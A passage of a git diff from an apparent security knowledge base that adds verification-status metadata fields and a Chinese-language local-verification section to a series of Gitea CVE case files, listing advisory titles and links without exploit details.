[link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-0798.md) | +| Gitea has improper access control for uploaded attachments in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:53.977351Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20736.md) | +| Gitea does not properly validate project ownership in organization project operations in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:57.697708Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20750.md) | +| Gitea improperly exposes issue and pull request titles in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:54.012782Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20800.md) | +| Gitea improperly exposes issue titles and repository names through previously started stopwatches in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:54.692700Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20883.md) | +| Gitea does not properly verify authorization when canceling scheduled auto-merges via the web interface in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:56.025932Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20888.md) | +| Gitea does not properly validate repository ownership when deleting Git LFS locks in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:55.339967Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20897.md) | +| Gitea does not properly validate ownership when toggling OpenID URI visibility in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:54.244003Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20904.md) | +| Gitea does not properly validate repository ownership when linking attachments to releases in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:55.747880Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20912.md) | +| Gitea's /api/v1/user endpoint has different responses for failed authentication depending on whether a username exists in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:49.801641Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-69413.md) | +| Gitea mishandles authorization for deletion of releases in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:49.095775Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68938.md) | +| Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:48.777563Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68939.md) | +| Gitea doesn't adequately enforce branch deletion permissions after merging a pull request. in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:50.087298Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68940.md) | +| Gitea mishandles access to a private resource upon receiving an API token with scope limited to public resources in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:50.339953Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68941.md) | +| Gitea allows XSS because the search input box (for creating tags and branches) is v-html instead of v-text in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:49.781753Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68942.md) | +| Gitea inadvertently discloses users' login times by allowing (for example) the lastlogintime explore/users sort order in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:49.213758Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68943.md) | +| Gitea sometimes mishandles propagation of token scope for access control within one of its own package registries in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:50.526913Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68944.md) | +| Gitea: anonymous user can visit private user's project in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:51.457970Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68945.md) | +| Gitea vulnerable to Cross-site Scripting in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:57:50.473303Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68946.md) | +| Gitea vulnerable to Argument Injection in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:52:41.181693Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-42968.md) | +| Improper Privilege Management in Gitea in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:52:33.136607Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45330.md) | +| Gitea Remote Code Execution (RCE) in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:52:20.787387Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2018-18926.md) | +| Denial of Service in Gitea in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:52:17.939867Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2020-13246.md) | +| Cross-site Scripting in Gitea in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:52:18.307544Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2021-28378.md) | +| Gitea Missing Authorization vulnerability in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:50:45.472605Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-0905.md) | +| Stored Cross-site Scripting in gitea in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:50:45.577318Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-1928.md) | +| Arbitrary file deletion in gitea in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:50:19.647131Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-27313.md) | +| Shell command injection in gitea in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:50:23.949796Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-30781.md) | +| Path Traversal in Gitea in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:50:06.638863Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2021-29134.md) | +| Reuse of one time passwords allowed in Gitea in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:52:07.604662Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45331.md) | +| Capture-replay in Gitea in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:52:07.840324Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45327.md) | +| Gitea erroneous repo clones in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:54:07.076900Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-38795.md) | +| Gogs and Gitea SSRF Vulnerability in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:54:04.686907Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2018-15192.md) | +| Gitea XSS Vulnerability in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:53:57.848904Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2019-1010261.md) | +| Gitea allowed assignment of private issues in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:55:04.505871Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-38183.md) | +| Buffer Overflow in gitea in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:55:15.307648Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2021-3382.md) | +| Gitea Open Redirect in code.gitea.io/gitea | `unknown` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-03T04:51:49.844240Z` | [link](/Users/x/websafe/07-framework-security/platforms/gitea/cases/gitea-cve-2022-1058.md) | diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2018-15192.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2018-15192.md index be00a9d2..2afba50f 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2018-15192.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2018-15192.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:54:04.686907Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -35,6 +39,15 @@ primary_source: "https://github.com/advisories/GHSA-fg3x-rwq9-74cw" # Gogs and Gitea SSRF Vulnerability in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2018-15192` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2018-18926.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2018-18926.md index d23af864..4c53c119 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2018-18926.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2018-18926.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:52:20.787387Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -32,6 +36,15 @@ primary_source: "https://github.com/advisories/GHSA-hf6f-jq25-8gq9" # Gitea Remote Code Execution (RCE) in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2018-18926` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2019-1010261.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2019-1010261.md index 5ca32535..8ebddbdb 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2019-1010261.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2019-1010261.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:53:57.848904Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-5rh7-6gfj-mc87" # Gitea XSS Vulnerability in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2019-1010261` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2020-13246.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2020-13246.md index ef8f246d..1a22bdfa 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2020-13246.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2020-13246.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:52:17.939867Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-g2qx-6ghw-67hm" # Denial of Service in Gitea in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2020-13246` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2021-28378.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2021-28378.md index 8140a66c..e41687e2 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2021-28378.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2021-28378.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:52:18.307544Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -34,6 +38,15 @@ primary_source: "https://github.com/advisories/GHSA-g95p-88p4-76cm" # Cross-site Scripting in Gitea in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2021-28378` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2021-29134.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2021-29134.md index 9cee9884..755ed2da 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2021-29134.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2021-29134.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:50:06.638863Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -34,6 +38,15 @@ primary_source: "https://github.com/advisories/GHSA-h3q4-vmw4-cpr5" # Path Traversal in Gitea in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2021-29134` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2021-3382.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2021-3382.md index 88a886eb..f4176463 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2021-3382.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2021-3382.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:55:15.307648Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-9f8c-pfvv-p4gm" # Buffer Overflow in gitea in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2021-3382` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45327.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45327.md index c12aa61b..7a8c9e99 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45327.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45327.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:52:07.840324Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-jrpg-35hw-m4p9" # Capture-replay in Gitea in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2021-45327` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45330.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45330.md index f00dd83d..34a6b274 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45330.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45330.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:52:33.136607Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-pg38-r834-g45j" # Improper Privilege Management in Gitea in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2021-45330` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45331.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45331.md index 4f868851..cc602669 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45331.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2021-45331.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:52:07.604662Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-hfmf-q69j-6m5p" # Reuse of one time passwords allowed in Gitea in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2021-45331` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2022-0905.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2022-0905.md index 43e97948..d2c7c29f 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2022-0905.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2022-0905.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:50:45.472605Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-jr9c-h74f-2v28" # Gitea Missing Authorization vulnerability in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2022-0905` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2022-1058.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2022-1058.md index e2c9bc36..fc3e413e 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2022-1058.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2022-1058.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:51:49.844240Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-4rqq-rxvc-v2rc" # Gitea Open Redirect in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2022-1058` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2022-1928.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2022-1928.md index 723a4ba5..48854263 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2022-1928.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2022-1928.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:50:45.577318Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -34,6 +38,15 @@ primary_source: "https://github.com/advisories/GHSA-ph3w-2843-72mx" # Stored Cross-site Scripting in gitea in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2022-1928` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2022-27313.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2022-27313.md index 65762101..708cee48 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2022-27313.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2022-27313.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:50:19.647131Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-g7p7-x6w7-w6qg" # Arbitrary file deletion in gitea in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2022-27313` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2022-30781.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2022-30781.md index 00c7abff..366db05a 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2022-30781.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2022-30781.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:50:23.949796Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-p5f9-c9j9-g8qx" # Shell command injection in gitea in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2022-30781` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2022-38183.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2022-38183.md index 8732496d..abca4dd7 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2022-38183.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2022-38183.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:55:04.505871Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-fhv8-m4j4-cww2" # Gitea allowed assignment of private issues in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2022-38183` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2022-38795.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2022-38795.md index 1f191f3d..4c87d360 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2022-38795.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2022-38795.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:54:07.076900Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-8j3v-68w3-3848" # Gitea erroneous repo clones in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2022-38795` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2022-42968.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2022-42968.md index 0d90ef42..24ac226b 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2022-42968.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2022-42968.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:52:41.181693Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-w8xw-7crf-h23x" # Gitea vulnerable to Argument Injection in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2022-42968` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68938.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68938.md index 968ac234..207992a6 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68938.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68938.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:49.095775Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-cm54-pfmc-xrwx" # Gitea mishandles authorization for deletion of releases in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2025-68938` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68939.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68939.md index c90ce960..00f86109 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68939.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68939.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:48.777563Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-263q-5cv3-xq9g" # Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2025-68939` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68940.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68940.md index 337bedf0..7b773d3e 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68940.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68940.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:50.087298Z" severity: "unknown" exploit_status: "unknown" 